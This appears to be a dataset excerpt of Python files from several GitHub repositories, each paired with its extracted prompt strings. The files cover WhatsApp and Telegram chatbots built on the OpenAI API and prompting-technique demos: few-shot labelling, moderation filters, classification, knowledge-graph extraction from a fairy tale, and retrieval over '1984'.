openai.api_key = os.environ.get('OPENAI_API_KEY')  # load the API key from the environment instead of hardcoding it
prompt = input("Enter your Command ")
response = openai.Completion.create(
model="text-davinci-003",
prompt=prompt,
temperature=0.7,
max_tokens=256,
top_p=1,
frequency_penalty=0,
presence_penalty=0
)
text = response.get('choices')[0].get('text')
print(text) | [
"Enter your Command "
] |
2024-01-10 | infiloop2/infibot | message_handler.py | import time
import os
from system_messages import get_intro_message, under_quota_message, too_long_message,get_privacy_message
from rate_limits import is_within_limits, reset_limits, use_one_limit
from short_term_memory import get_short_term_memory, write_short_term_memory, append_history
from openai_api import get_openai_response
from dynamo_api import get_quota, get_last_intro_message_timestamp, put_last_intro_message_timestamp, get_last_privacy_accepted_timestamp, get_is_private_mode_on, get_is_unsafe_mode_on, get_last_unsafe_accepted_timestamp
from commands import handle_command
from whatsapp_sender import send_whatsapp_text_reply
from system_commands import is_system_command, handle_system_command, get_unsafe_mode_on_message
# Update this whenever you change privacy/unsafe message so that you prompt the user to accept it again
last_privacy_updated_timestamp = 0
last_unsafe_updated_timestamp = 1682950000
# Handle text messages to phone number ID, from, timestamp with message body
def handle_text_message(phone_number_id, from_, timestamp, message, user_secret):
current_time = int(time.time())
if current_time - timestamp > 60:
# Too old messages which may come through because of whatsapp server issues or retries due to errors
return
# Admin system messages: "Quota <phone_number> <new_quota> <admin_password>" resets a user's quota
if from_ == os.environ.get("admin_phone_number"):
if message.startswith("Quota"):
spl = message.split(" ")
if len(spl) == 4:
if spl[3] != os.environ.get("admin_password"):
send_whatsapp_text_reply(phone_number_id, from_, "Invalid admin password", is_private_on=False, is_unsafe_on=False)
return
reset_limits(spl[1], spl[2])
send_whatsapp_text_reply(phone_number_id, from_, "Quota reset for " + spl[1] + " to " + str(spl[2]), is_private_on=False, is_unsafe_on=False)
return
# Check if within limits
if not is_within_limits(from_):
send_whatsapp_text_reply(phone_number_id, from_, under_quota_message(from_), is_private_on=False, is_unsafe_on=False)
return
if len(message) > 500:
send_whatsapp_text_reply(phone_number_id, from_, too_long_message(), is_private_on=False, is_unsafe_on=False)
return
# Global modes
is_private_on = get_is_private_mode_on(from_, user_secret)
is_unsafe_on = get_is_unsafe_mode_on(from_, user_secret)
# Verify user has accepted privacy policy
last_privacy_ts = get_last_privacy_accepted_timestamp(from_, user_secret)
if last_privacy_ts < last_privacy_updated_timestamp:
send_whatsapp_text_reply(phone_number_id, from_, "Please read and accept privacy policy before continuing", is_private_on, is_unsafe_on)
send_whatsapp_text_reply(phone_number_id, from_, get_privacy_message(), is_private_on, is_unsafe_on)
return
# Verify user has accepted unsafe policy if in unsafe mode
if is_unsafe_on:
last_unsafe_ts = get_last_unsafe_accepted_timestamp(from_, user_secret)
if last_unsafe_ts < last_unsafe_updated_timestamp:
send_whatsapp_text_reply(phone_number_id, from_, "Please read and accept conditions for unsafe mode before proceeding", is_private_on, is_unsafe_on)
send_whatsapp_text_reply(phone_number_id, from_, get_unsafe_mode_on_message(), is_private_on, is_unsafe_on)
return
history = get_short_term_memory(from_, user_secret)
if len(history) == 0:
# Send welcome message if not sent within last 7 days already
last_ts = get_last_intro_message_timestamp(from_, user_secret)
if current_time - last_ts > 7 * 24 * 3600:
send_whatsapp_text_reply(phone_number_id, from_, get_intro_message(get_quota(from_)), is_private_on, is_unsafe_on)
put_last_intro_message_timestamp(from_, current_time, user_secret)
# Handle system messages from users
if is_system_command(message):
further_ai_reponse, updated_user_message = handle_system_command(message, phone_number_id, from_, user_secret, is_private_on, is_unsafe_on)
if not further_ai_reponse:
return
if updated_user_message is not None:
message = updated_user_message
##### Main AI Response #####
# TODO: Fork if unsafe mode is on
use_one_limit(from_)
ai_response, command = get_openai_response(message, history)
#Send assistant reply
send_whatsapp_text_reply(phone_number_id, from_, ai_response, is_private_on, is_unsafe_on)
# Append to history
history = append_history(history, "user", message)
history = append_history(history, "assistant", ai_response)
write_short_term_memory(from_, history, user_secret, is_private_on)
if command is not None:
handle_command(command, phone_number_id, from_, history, user_secret, is_private_on, is_unsafe_on) | [] |
2024-01-10 | infiloop2/infibot | commands.py | from openai_api import run_dalle, get_openai_response, getChatCompletionResponseCommand
from whatsapp_sender import send_whatsapp_image_reply, send_whatsapp_text_reply
from short_term_memory import write_short_term_memory, append_history
import requests
from bs4 import BeautifulSoup
import os
import re
from system_messages import scrape_error_message, get_web_search_safety_prompt, unsafe_google_search_message
def handle_command(command, phone_number_id, from_, history, user_secret, is_private_on, is_unsafe_on):
if is_unsafe_on:
send_whatsapp_text_reply(phone_number_id, from_, "Sorry commands are disabled in unsafe mode.", is_private_on, is_unsafe_on)
history = append_history(history, "system", "There was an error executing the command")
write_short_term_memory(from_, history, user_secret, is_private_on)
return
if command['command_name'] == 'dalle':
image_prompt = command['image_prompt']
url = run_dalle(image_prompt)
send_whatsapp_image_reply(phone_number_id, from_, url)
history = append_history(history, "system", "The user was given the generated image")
write_short_term_memory(from_, history, user_secret, is_private_on)
return
if command['command_name'] == 'web_search':
search_prompt = command['search_prompt']
if not is_google_search_safe(search_prompt):
send_whatsapp_text_reply(phone_number_id, from_, unsafe_google_search_message(), is_private_on, is_unsafe_on)
history = append_history(history, "system", "The web search was not performed as it was not safe")
write_short_term_memory(from_, history, user_secret, is_private_on)
return
search_result = google_search(search_prompt)
if search_result is None:
# Some error happened
send_whatsapp_text_reply(phone_number_id, from_, scrape_error_message(), is_private_on, is_unsafe_on)
history = append_history(history, "system", "There was an error doing a web search")
write_short_term_memory(from_, history, user_secret, is_private_on)
return
# Append search results and generate a new response
history = append_history(history, "system", "The web search resulted in the following search results: " + search_result)
ai_response, _ = get_openai_response(None, history, False)
send_whatsapp_text_reply(phone_number_id, from_, ai_response, is_private_on, is_unsafe_on)
history = append_history(history, "assistant", ai_response)
write_short_term_memory(from_, history, user_secret, is_private_on)
return
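# Query the Google Custom Search JSON API and return text scraped from the top three results (None on failure).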
def google_search(term):
url = "https://www.googleapis.com/customsearch/v1"
params = {
"key": os.environ.get("google_search_key"),
"cx": os.environ.get("google_cx"),
"q": term
}
response = requests.get(url, params=params)
if response.status_code == 200:
try:
r = ""
for item in response.json()['items'][:3]:
r = r + scrape_link(item['link'], 250) + "\n\n"
return r
except Exception as _:
return None
else:
return None
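# Ask the model whether the query is safe to search; a reply containing "no" marks it unsafe.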
def is_google_search_safe(query):
messages = [
{"role": "system", "content": get_web_search_safety_prompt(query)},
]
ai_response, _ = getChatCompletionResponseCommand(messages)
return ai_response.lower().find("no") == -1
def scrape_link(url, limit):
try:
response = requests.get(url)
soup = BeautifulSoup(response.text, "html.parser")
all_text = soup.get_text().lower()
all_text = all_text.replace("\n", " ")
#all_text = re.sub('[^a-z0-9 °]+', '', all_text)
words = all_text.split(" ")
good_words = [string for string in words if len(string) > 2 and len(string) < 20]
return " ".join(good_words[:limit])
except Exception as _:
return "" | [
"image_prompt",
"search_prompt"
] |
2024-01-10 | ansariparvej/Telebot-Using-Chatgpt-API | telebot.py | import os
from dotenv import load_dotenv
from aiogram import Bot, Dispatcher, executor, types
import openai
import sys
class Reference:
"""
A class to store the previous response from the chatGPT API.
"""
def __init__(self) -> None:
self.response = ""
# Load environment variables
load_dotenv()
# Set up OpenAI API key
openai.api_key = os.getenv("OPENAI_API_KEY")
# Create a reference object to store the previous response
reference = Reference()
# Bot token can be obtained via https://t.me/BotFather
TOKEN = os.getenv("TOKEN")
# Model used in chatGPT
MODEL_NAME = "gpt-3.5-turbo"
# Initialize bot and dispatcher
bot = Bot(token=TOKEN)
dispatcher = Dispatcher(bot)
#2
def clear_past():
"""
A function to clear the previous conversation and context.
"""
reference.response = ""
@dispatcher.message_handler(commands=['start'])
async def welcome(message: types.Message):
"""
A handler to welcome the user and clear past conversation and context.
"""
clear_past()
await message.reply("Hello! \nI'm chatGPT Telegram bot created by Bappy.\n How can I assist you?")
@dispatcher.message_handler(commands=['clear'])
async def clear(message: types.Message):
"""
A handler to clear the previous conversation and context.
"""
clear_past()
await message.reply("I've cleared the past conversation and context.")
@dispatcher.message_handler(commands=['help'])
async def helper(message: types.Message):
"""
A handler to display the help menu.
"""
help_command = """
Hi there, I'm a chatGPT Telegram bot created by Bappy! Please follow these commands -
/start - to start the conversation
/clear - to clear the past conversation and context.
/help - to get this help menu.
I hope this helps. :)
"""
await message.reply(help_command)
@dispatcher.message_handler()
async def chatgpt(message: types.Message):
"""
A handler to process the user's input and generate a response using the chatGPT API.
"""
print(f">>> USER: \n\t{message.text}")
response = openai.ChatCompletion.create(
model = MODEL_NAME,
messages = [
{"role": "assistant", "content": reference.response}, # role assistant
{"role": "user", "content": message.text} #our query
]
)
reference.response = response['choices'][0]['message']['content']
print(f">>> chatGPT: \n\t{reference.response}")
await bot.send_message(chat_id = message.chat.id, text = reference.response)
if __name__ == '__main__':
executor.start_polling(dispatcher, skip_updates=False)
| [] |
2024-01-10 | cmrfrd/PromptingTechniques | prompting_techniques~5_higher_order_functions_map.py | import asyncio
import enum
from typing import TYPE_CHECKING, Optional
import anyio
import instructor
import numpy as np
import openai
import pandas as pd
import tiktoken
import typer
from instructor.patch import wrap_chatcompletion
from openai.types.chat.chat_completion import ChatCompletion
from pydantic import BaseModel
from sklearn.datasets import fetch_20newsgroups
from sklearn.metrics import confusion_matrix, precision_score, recall_score
from tenacity import retry, wait_random_exponential
from tqdm import asyncio as tqdm_asyncio
from prompting_techniques import AsyncTyper, execute, format_prompt
np.random.seed(1)
client = openai.AsyncOpenAI()
func = wrap_chatcompletion(client.chat.completions.create)
app = AsyncTyper()
## Pre process dataset
## https://scikit-learn.org/stable/datasets/real_world.html#newsgroups-dataset
percent_of_data = 0.005
newsgroups = fetch_20newsgroups(
subset="all", data_home="./data", remove=("headers", "footers", "quotes")
)
newsgroups_target_names = [newsgroups.target_names[i] for i in newsgroups.target] # type: ignore
percent_of_data = 0.1
num_targets = 5
target_names_small = np.random.choice(newsgroups.target_names, num_targets, replace=False) # type: ignore
df = pd.DataFrame({"text": newsgroups.data, "target": newsgroups_target_names}) # type: ignore
df["text_short"] = df["text"].apply(lambda x: x[:5000])
test_df = df[df["target"].isin(target_names_small)].sample(frac=percent_of_data, random_state=1)
NewsTopic = enum.Enum("NewsTopic", [(t, t) for t in target_names_small])
class InferedNewsTopic(BaseModel):
topic: "NewsTopic" if TYPE_CHECKING else NewsTopic # type: ignore
semaphore = asyncio.Semaphore(128)
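# Classify a single article: retries with exponential backoff, each OpenAI call capped at 1 second
# and re-issued up to three times, with a semaphore limiting concurrency to 128 in-flight requests.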
@retry(wait=wait_random_exponential(multiplier=1, max=3))
async def classify_article(article: str) -> InferedNewsTopic:
async with semaphore:
result: Optional[InferedNewsTopic] = None
for attempt in range(3):
try:
result = await asyncio.wait_for(
func(
messages=[
{
"role": "user",
"content": format_prompt(
f"""
You are an AI data labeler. You have one goal: to classify a given news article into one of the following topics: {', '.join(target_names_small)}.
The topics are abbreviated. Remember to think about how the full article relates to the topic.
Think deeply and step by step about which topic this article belongs to. Check your work carefully.
Here is the article:
{article}
The topic of this article is one of the following "{', '.join(target_names_small)}". What is the topic of this article? Please output just the topic and nothing else.
"""
),
},
],
model="gpt-3.5-turbo-0613",
response_model=InferedNewsTopic,
temperature=0.1,
seed=256,
),
timeout=1,
)
break
except asyncio.TimeoutError:
continue
if result is None:
raise RuntimeError("Failed to classify article after 3 attempts")
return InferedNewsTopic.model_validate(result)
@app.command()
async def map_example():
"""Run an example support request label task."""
typer.echo("Running map' based classification example on newsgroups dataset.")
typer.echo("\n")
typer.echo("Dataset stats:")
typer.echo(f" - Number of articles: {len(test_df)}")
typer.echo(f" - Topics: {', '.join(target_names_small)}")
typer.echo("\n")
coros = [classify_article(article) for article in test_df["text_short"].tolist()]
tasks = [asyncio.create_task(coro) for coro in coros]
results = list(await execute(tasks, desc="Classifying articles"))
test_df["inferred_target"] = list(map(lambda i: i.topic.value, results))
typer.echo("\n\n\n")
num_correct = (test_df["target"] == test_df["inferred_target"]).sum()
typer.echo(f"Number correct: {num_correct}")
typer.echo(f"Number incorrect: {len(test_df) - num_correct}")
accuracy = (test_df["target"] == test_df["inferred_target"]).mean()
typer.echo(f"Accuracy: {accuracy}")
precision = precision_score(test_df["target"], test_df["inferred_target"], average="macro")
typer.echo(f"Precision: {precision}")
recall = recall_score(test_df["target"], test_df["inferred_target"], average="macro")
typer.echo(f"Recall: {recall}")
typer.echo("\n\n")
typer.echo("Confusion matrix:")
cm = confusion_matrix(test_df["target"], test_df["inferred_target"])
labels = sorted(list(set(test_df["target"]) | set(test_df["inferred_target"])))
typer.echo(pd.DataFrame(cm, index=labels, columns=labels).to_markdown())
if __name__ == "__main__":
app()
| [
", "
] |
2024-01-10 | cmrfrd/PromptingTechniques | prompting_techniques~7_knowledge_base_generation.py | import math
from itertools import islice
from typing import AsyncIterable, Optional
import networkx as nx
import nltk
import numpy as np
import openai
import pandas as pd
import tqdm
import typer
from asyncstdlib import map as amap
from asyncstdlib.functools import reduce as areduce
from graphviz import Digraph
from instructor.patch import wrap_chatcompletion
from pydantic import BaseModel, Field
from tenacity import retry, wait_random_exponential
from prompting_techniques import AsyncTyper, async_disk_cache, format_prompt
np.random.seed(1)
nltk.download("punkt")
client = openai.AsyncOpenAI()
func = wrap_chatcompletion(client.chat.completions.create)
app = AsyncTyper()
sent_detector = nltk.data.load("tokenizers/punkt/english.pickle")
ARTICLE = """
Little Red Riding Hood
Story by Leanne Guenther
Once upon a time, there was a little girl who lived in a village near the forest. Whenever she went out, the little girl wore a red riding cloak, so everyone in the village called her Little Red Riding Hood.
One morning, Little Red Riding Hood asked her mother if she could go to visit her grandmother as it had been awhile since they'd seen each other.
"That's a good idea," her mother said. So they packed a nice basket for Little Red Riding Hood to take to her grandmother.
When the basket was ready, the little girl put on her red cloak and kissed her mother goodbye.
"Remember, go straight to Grandma's house," her mother cautioned. "Don't dawdle along the way and please don't talk to strangers! The woods are dangerous."
"Don't worry, mommy," said Little Red Riding Hood, "I'll be careful."
But when Little Red Riding Hood noticed some lovely flowers in the woods, she forgot her promise to her mother. She picked a few, watched the butterflies flit about for awhile, listened to the frogs croaking and then picked a few more.
Little Red Riding Hood was enjoying the warm summer day so much, that she didn't notice a dark shadow approaching out of the forest behind her...
Suddenly, the wolf appeared beside her.
"What are you doing out here, little girl?" the wolf asked in a voice as friendly as he could muster.
"I'm on my way to see my Grandma who lives through the forest, near the brook," Little Red Riding Hood replied.
Then she realized how late she was and quickly excused herself, rushing down the path to her Grandma's house.
The wolf, in the meantime, took a shortcut...
The wolf, a little out of breath from running, arrived at Grandma's and knocked lightly at the door.
"Oh thank goodness dear! Come in, come in! I was worried sick that something had happened to you in the forest," said Grandma thinking that the knock was her granddaughter.
The wolf let himself in. Poor Granny did not have time to say another word, before the wolf gobbled her up!
The wolf let out a satisfied burp, and then poked through Granny's wardrobe to find a nightgown that he liked. He added a frilly sleeping cap, and for good measure, dabbed some of Granny's perfume behind his pointy ears.
A few minutes later, Red Riding Hood knocked on the door. The wolf jumped into bed and pulled the covers over his nose. "Who is it?" he called in a cackly voice.
"It's me, Little Red Riding Hood."
"Oh how lovely! Do come in, my dear," croaked the wolf.
When Little Red Riding Hood entered the little cottage, she could scarcely recognize her Grandmother.
"Grandmother! Your voice sounds so odd. Is something the matter?" she asked.
"Oh, I just have touch of a cold," squeaked the wolf adding a cough at the end to prove the point.
"But Grandmother! What big ears you have," said Little Red Riding Hood as she edged closer to the bed.
"The better to hear you with, my dear," replied the wolf.
"But Grandmother! What big eyes you have," said Little Red Riding Hood.
"The better to see you with, my dear," replied the wolf.
"But Grandmother! What big teeth you have," said Little Red Riding Hood her voice quivering slightly.
"The better to eat you with, my dear," roared the wolf and he leapt out of the bed and began to chase the little girl.
Almost too late, Little Red Riding Hood realized that the person in the bed was not her Grandmother, but a hungry wolf.
She ran across the room and through the door, shouting, "Help! Wolf!" as loudly as she could.
A woodsman who was chopping logs nearby heard her cry and ran towards the cottage as fast as he could.
He grabbed the wolf and made him spit out the poor Grandmother who was a bit frazzled by the whole experience, but still in one piece.
"Oh Grandma, I was so scared!" sobbed Little Red Riding Hood, "I'll never speak to strangers or dawdle in the forest again."
"There, there, child. You've learned an important lesson. Thank goodness you shouted loud enough for this kind woodsman to hear you!"
The woodsman knocked out the wolf and carried him deep into the forest where he wouldn't bother people any longer.
Little Red Riding Hood and her Grandmother had a nice lunch and a long chat.
"""
class Node(BaseModel):
id: int
label: str
color: str
def __hash__(self) -> int:
return hash((id, self.label))
class Edge(BaseModel):
source: int
target: int
label: str
color: str = "black"
def __hash__(self) -> int:
return hash((self.source, self.target, self.label))
class KnowledgeGraph(BaseModel):
nodes: Optional[list[Node]] = Field(..., default_factory=list)
edges: Optional[list[Edge]] = Field(..., default_factory=list)
def update(self, other: "KnowledgeGraph") -> "KnowledgeGraph":
"""Updates the current graph with the other graph, deduplicating nodes and edges."""
nodes = self.nodes if self.nodes is not None else []
edges = self.edges if self.edges is not None else []
other_nodes = other.nodes if other.nodes is not None else []
other_edges = other.edges if other.edges is not None else []
return KnowledgeGraph(
nodes=list(set(nodes + other_nodes)),
edges=list(set(edges + other_edges)),
)
def draw(self, prefix: Optional[str] = None):
dot = Digraph(comment="Knowledge Graph")
nodes = self.nodes if self.nodes is not None else []
edges = self.edges if self.edges is not None else []
# Add nodes
for node in nodes:
dot.node(str(node.id), node.label, color=node.color)
# Add edges
for i, edge in enumerate(edges):
dot.edge(str(edge.source), str(edge.target), label=f"{i} {edge.label}", color=edge.color)
dot.render(filename=f"./data/{prefix}", format="png", view=False)
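# Extract new character nodes and interaction edges from a window of text and merge them into the running
# graph; results are cached on disk and failed calls are retried with exponential backoff.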
@async_disk_cache(filename="./data/cache.db")
@retry(wait=wait_random_exponential(multiplier=1, max=3))
async def update_kb_graph(graph: KnowledgeGraph, text: str) -> KnowledgeGraph:
result: KnowledgeGraph = await func(
messages=[
{
"role": "system",
"content": format_prompt(
"""
You are an iterative knowledge graph builder.
You are given the current state of the graph, and you must append the nodes and edges
to it. Do not provide any duplicates and try to reuse nodes as much as possible.
- Ensure that the only nodes are characters of the story
- Ensure that edges are significant interactions between characters
- Do not repeat nodes or edges of characters or interactions that have already been added
- Ignore everything else
"""
),
},
{
"role": "user",
"content": f"""Extract any new nodes and edges from the following:
{text}""",
},
{
"role": "user",
"content": f"""Here is the current state of the graph:
{graph.model_dump_json(indent=2)}""",
},
],
model="gpt-4",
response_model=KnowledgeGraph,
temperature=0,
seed=256,
)
kb = KnowledgeGraph.model_validate(graph.update(result))
kb.draw("knowledge_graph")
return kb
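# Yield overlapping windows of sentences so consecutive extraction calls share context across chunk boundaries.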
async def sliding_window(iterable: list[str], window_size: int, stride: int) -> AsyncIterable[list[str]]:
"""Generate a sliding window of specified size over the iterable."""
total_iterations = math.ceil((len(iterable) - window_size) / stride) + 1
with tqdm.tqdm(desc="Sliding Window", total=total_iterations) as progress:
for i in range(0, len(iterable)-window_size+1, stride):
yield iterable[i:i+window_size]
progress.update(1)
@app.command()
async def kb_generation():
typer.echo("Running reduce based summary on news article.")
typer.echo("\n")
window_size = 5
stride = 4
sentences: list[str] = sent_detector.tokenize(ARTICLE) # type: ignore
async def join_sentences(sentences: list[str]) -> str: return " ".join(sentences)
kb = await areduce(update_kb_graph, amap(join_sentences, sliding_window(sentences, window_size, stride)), initial=KnowledgeGraph()) # type: ignore
kb.draw("knowledge_graph") # type: ignore
if __name__ == "__main__":
app()
| [
"Extract any new nodes and edges from the following:\n\n PLACEHOLDER",
"\n You are an iterative knowledge graph builder.\n You are given the current state of the graph, and you must append the nodes and edges \n to it Do not procide any duplcates and try to reuse nodes as much as possible. \n \n - Ensure that the only nodes are characters of the story\n - Ensure that edges are significant interactions between characters\n - Do not repeat nodes or edges of characters or interactions that have already been added\n - Ignore everything else\n "
] |
2024-01-10 | cmrfrd/PromptingTechniques | prompting_techniques~2_few_shot.py | import openai
import typer
from prompting_techniques import AsyncTyper, format_prompt
client = openai.AsyncOpenAI()
app = AsyncTyper()
@app.command()
async def job_description_labeler():
"""From a given job description, label it with the appropriate job title."""
text: str = str(typer.prompt("Enter a job description", type=str))
assert len(text) > 0, "Please provide some text."
response = await client.chat.completions.create(
messages=[
{
"role": "system",
"content": format_prompt(f"""
You are an AI job classification bot. You have one goal: to label job descriptions with the appropriate job title / role.
Here are some examples of job descriptions and their corresponding job titles:
Description: you will advise clients on the adoption and implementation of renewable energy solutions. Your responsibilities include conducting feasibility studies, providing cost-benefit analyses, and staying up-to-date with the latest in sustainable technology.
Job: Renewable Energy Consultant
Description: will lead efforts to connect the organization with the local community. This role involves planning and executing community events, managing social media outreach, and building relationships with community leaders to promote the organization's mission and values
Job: Community Outreach Coordinator
Description: will oversee the development and management of urban farming projects. This role involves collaborating with community groups, managing sustainable agricultural practices, and promoting local food production in urban settings
Job: Urban Agriculture Director
Description: you will organize and manage commercial space travel experiences for clients. This includes coordinating with aerospace companies, ensuring compliance with safety regulations, and providing clients with a once-in-a-lifetime journey into space.
Job: Space Tourism Manager
Here is a new job description, please label it with the appropriate job title, just output the title nothing else:
Description: {text}
""")
}
],
max_tokens=64,
temperature=0.9,
model="gpt-4",
stream=True,
)
typer.echo("Job: ", nl=False)
async for message in response:
assert len(message.choices) > 0, "No text was provided."
typer.echo(message.choices[0].delta.content, nl=False)
if __name__ == "__main__":
app() | [
"\n You are an AI job classification bot. You have one goal: to label job descriptions with the appropriate job title / role.\n \n Here are some examples of job descriptions and their corresponding job titles:\n\n Description: you will advise clients on the adoption and implementation of renewable energy solutions. Your responsibilities include conducting feasibility studies, providing cost-benefit analyses, and staying up-to-date with the latest in sustainable technology.\n Job: Renewable Energy Consultant\n \n Description: will lead efforts to connect the organization with the local community. This role involves planning and executing community events, managing social media outreach, and building relationships with community leaders to promote the organization's mission and values\n Job: Community Outreach Coordinator\n \n Description: will oversee the development and management of urban farming projects. This role involves collaborating with community groups, managing sustainable agricultural practices, and promoting local food production in urban settings\n Job: Urban Agriculture Director\n \n Description: you will organize and manage commercial space travel experiences for clients. This includes coordinating with aerospace companies, ensuring compliance with safety regulations, and providing clients with a once-in-a-lifetime journey into space.\n Job: Space Tourism Manager\n \n Here is a new job description, please label it with the appropriate job title, just output the title nothing else:\n \n Description: PLACEHOLDER\n "
] |
2024-01-10 | cmrfrd/PromptingTechniques | prompting_techniques~4_multiple_choice.py | import enum
import openai
import typer
from instructor.patch import wrap_chatcompletion
from pydantic import BaseModel
from prompting_techniques import AsyncTyper, format_prompt
client = openai.AsyncOpenAI()
app = AsyncTyper()
class SupportRequestLabel(str, enum.Enum):
"""The types of support requests."""
hardware = "hardware"
software = "software"
network = "network"
security = "security"
access = "access"
training = "training"
other = "other"
class SupportRequestLabels(BaseModel):
labels: list[SupportRequestLabel]
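# instructor's patched chat completion parses the model output directly into the SupportRequestLabels model.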
async def get_support_request_labels(text: str) -> SupportRequestLabels:
func = wrap_chatcompletion(client.chat.completions.create)
result: SupportRequestLabels = await func(
messages=[
{
"role": "user",
"content": format_prompt(f"""
You are an AI support request labeler. You have one goal: to classify a given support request into one or more labels.
Classify the following support request: {text}
"""),
},
],
model="gpt-4",
response_model=SupportRequestLabels,
temperature=0,
seed=256,
)
return SupportRequestLabels.model_validate(result)
@app.command()
async def label():
"""From a given message of text, classify it into one or more support request labels."""
text: str = str(typer.prompt("Enter a support request", type=str))
assert len(text) > 0, "Please provide some text."
typer.echo("Labels:")
labels = await get_support_request_labels(text)
for label in labels.labels:
typer.echo(f" - {label.value}")
@app.command()
async def example():
"""Run an example support request label task."""
text = "Help me, I think something is broken! I can't access my email."
assert len(text) > 0, "Please provide some text."
typer.echo(f"Support Request: {text}")
typer.echo("Labels:")
labels = await get_support_request_labels(text)
for label in labels.labels:
typer.echo(f" - {label.value}")
if __name__ == "__main__":
app() | [
"\n You are an AI support request labeler. You have one goal: to classify a given support request into one or more labels.\n \n Classify the following support request: Help me, I think something is broken! I can't access my email.\n "
] |
2024-01-10 | cmrfrd/PromptingTechniques | prompting_techniques~3_multistep.py | import asyncio
import openai
import tiktoken
import typer
from prompting_techniques import AsyncTyper, format_prompt
client = openai.AsyncOpenAI()
app = AsyncTyper()
BOOL_STR = ["true", "false"]
BOOL_LOGIT_BIAS = dict(
(str(tiktoken.encoding_for_model("gpt-4").encode(t)[0]), int(100)) for t in BOOL_STR
)
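# Ask a yes/no question and bias generation toward a single "true"/"false" token (max_tokens=1, logit bias +100).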
async def bool_prompt(prompt: str) -> bool:
"""Prompt a boolean question."""
response = await client.chat.completions.create(
messages=[
{
"role": "system",
"content": prompt,
}
],
max_tokens=1,
temperature=0,
seed=256,
model="gpt-4",
logit_bias=BOOL_LOGIT_BIAS
)
content = response.choices[0].message.content
assert any(content == t for t in BOOL_STR), "No boolean value was outputed."
match content:
case "true":
return True
case "false":
return False
raise ValueError("No boolean value was outputed.")
async def has_profanity(text: str) -> bool:
"""Determine if a given text has profanity."""
return await bool_prompt(
format_prompt(f"""
You are an AI profanity filter. You have one goal: to determine if a given text has profanity. This includes profanity in any language, curse words, and slurs.
Here is the input text: {text}
Is there profanity in the text? Please output either "true" or "false" and nothing else.
""")
)
async def has_sensitive_topic(text: str) -> bool:
"""Determine if a given text has a sensative topic."""
return await bool_prompt(
format_prompt(f"""
You are an AI sensative topic filter. You have one goal: to determine if a given text has a sensative topic. This includes politics, religion, and other topics that may be considered offensive.
Here is the input text: {text}
Is there a sensative topic in the text? Please output either "true" or "false" and nothing else.
""")
)
async def has_spam(text: str) -> bool:
"""Determine if a given text is spam."""
return await bool_prompt(
format_prompt(f"""
You are an AI spam filter. You have one goal: to determine if a given text is spam. This includes advertisements, links, crypto scams, and other unwanted content.
Here is the input text: {text}
Is there spam in the text? Please output either "true" or "false" and nothing else.
""")
)
async def has_sensitive_data(text: str) -> bool:
"""Determine if a given text has sensative data."""
return await bool_prompt(
format_prompt(f"""
You are an AI sensative data filter. You have one goal: to determine if a given text has sensative data. This includes credit card numbers, social security numbers, phone numbers, and other personal information.
Here is the input text: {text}
Is there sensative data in the text? Please output either "true" or "false" and nothing else.
""")
)
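# Multistep pattern: rather than one large moderation prompt, each concern (profanity, sensitive
# topics, spam, sensitive data) gets its own narrow boolean prompt, and the CLI command below
# fans the checks out concurrently and combines the results.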
@app.command()
async def content_moderation():
"""From a given message of text, determine if it is safe for work."""
text: str = str(typer.prompt("Content moderation filter. Enter a chat message", type=str))
assert len(text) > 0, "Please provide some text."
typer.echo("Content moderation results:")
check_mapping = {
has_profanity: "Profanity detected.",
has_sensitive_topic: "Sensitive topic detected.",
has_spam: "Spam detected.",
has_sensitive_data: "Sensitive data detected.",
}
results = await asyncio.gather(*(check(text) for check in check_mapping))
# Print all the checks that were triggered
for check, result in zip(check_mapping, results):
if result:
typer.echo(check_mapping[check])
if not any(results):
typer.echo("No issues detected.")
if __name__ == "__main__":
app() | [] |
2024-01-10 | cmrfrd/PromptingTechniques | prompting_techniques~8_rag.py | import asyncio
import json
import math
import os
from itertools import islice
from typing import AsyncIterable, Iterable, Optional
import networkx as nx
import nltk
import numpy as np
import numpy.typing as npt
import openai
import pandas as pd
import tqdm
import typer
from asyncstdlib import map as amap
from asyncstdlib.functools import reduce as areduce
from graphviz import Digraph
from instructor.patch import wrap_chatcompletion
from pydantic import BaseModel, Field
from tenacity import retry, wait_random_exponential
from prompting_techniques import AsyncTyper, async_disk_cache, execute, format_prompt
np.random.seed(1)
nltk.download("punkt")
client = openai.AsyncOpenAI()
app = AsyncTyper()
sent_detector = nltk.data.load("tokenizers/punkt/english.pickle")
book_1984 = open("./data/1984.txt", "r").read()
semaphore = asyncio.Semaphore(128)
class VectorDatabase(BaseModel):
text: list[str]
embeddings: npt.NDArray[np.float32]
class Config:
arbitrary_types_allowed = True
def save_to_file(self, filename: str):
# Convert NumPy array to a list for JSON serialization
data = {"text": self.text, "embeddings": self.embeddings.tolist()}
with open(filename, "w") as file:
json.dump(data, file)
@classmethod
def load_from_file(cls, filename: str):
with open(filename, "r") as file:
data = json.load(file)
# Convert list back to NumPy array
data["embeddings"] = np.array(data["embeddings"], dtype=np.float32)
return cls(**data)
async def add_text(self, text: str) -> None:
async with semaphore:
embeddings_response = await client.embeddings.create(
model="text-embedding-ada-002",
input=text,
)
embedding: npt.NDArray[np.float32] = np.expand_dims(
np.array(embeddings_response.data[0].embedding), axis=0
)
self.text.append(text)
self.embeddings = np.concatenate([self.embeddings, embedding], axis=0)
async def top_k(self, query: str, k: int = 10) -> list[str]:
query_embedding_response = await client.embeddings.create(
model="text-embedding-ada-002",
input=query,
)
query_embedding: npt.NDArray[np.float32] = np.array(
query_embedding_response.data[0].embedding
)
# cosine similarity, get top k
similarity: npt.NDArray[np.float32] = np.dot(query_embedding, self.embeddings.T) / (
np.linalg.norm(query_embedding) * np.linalg.norm(self.embeddings, axis=1)
)
sorted_similarity_indices: npt.NDArray[np.int64] = np.argsort(similarity)[::-1]
top_k: list[str] = [self.text[i] for i in sorted_similarity_indices[:k]]
return top_k
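# Minimal usage sketch for VectorDatabase (illustrative only; assumes an OpenAI API key is
# configured and that text-embedding-ada-002 returns 1536-dimensional vectors):
#
#   vecdb = VectorDatabase(text=[], embeddings=np.empty((0, 1536), dtype=np.float32))
#   await vecdb.add_text("Big Brother is watching you.")
#   passages = await vecdb.top_k("surveillance", k=3)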
@retry(wait=wait_random_exponential(multiplier=1, max=3))
async def get_ask_1984_response(vecdb: VectorDatabase, question: str) -> AsyncIterable[str | None]:
related_passages = "\n".join(await vecdb.top_k(question, k=5))
result = await client.chat.completions.create(
messages=[
{
"role": "system",
"content": format_prompt(
"""
You are an AI question answer bot built with the knowledge and lessons from the famous book 1984 by George Orwell. \
You have one goal: to answer questions and give advice about the book 1984. \
Guidelines:
- You should answer the question directly and not provide any other information.
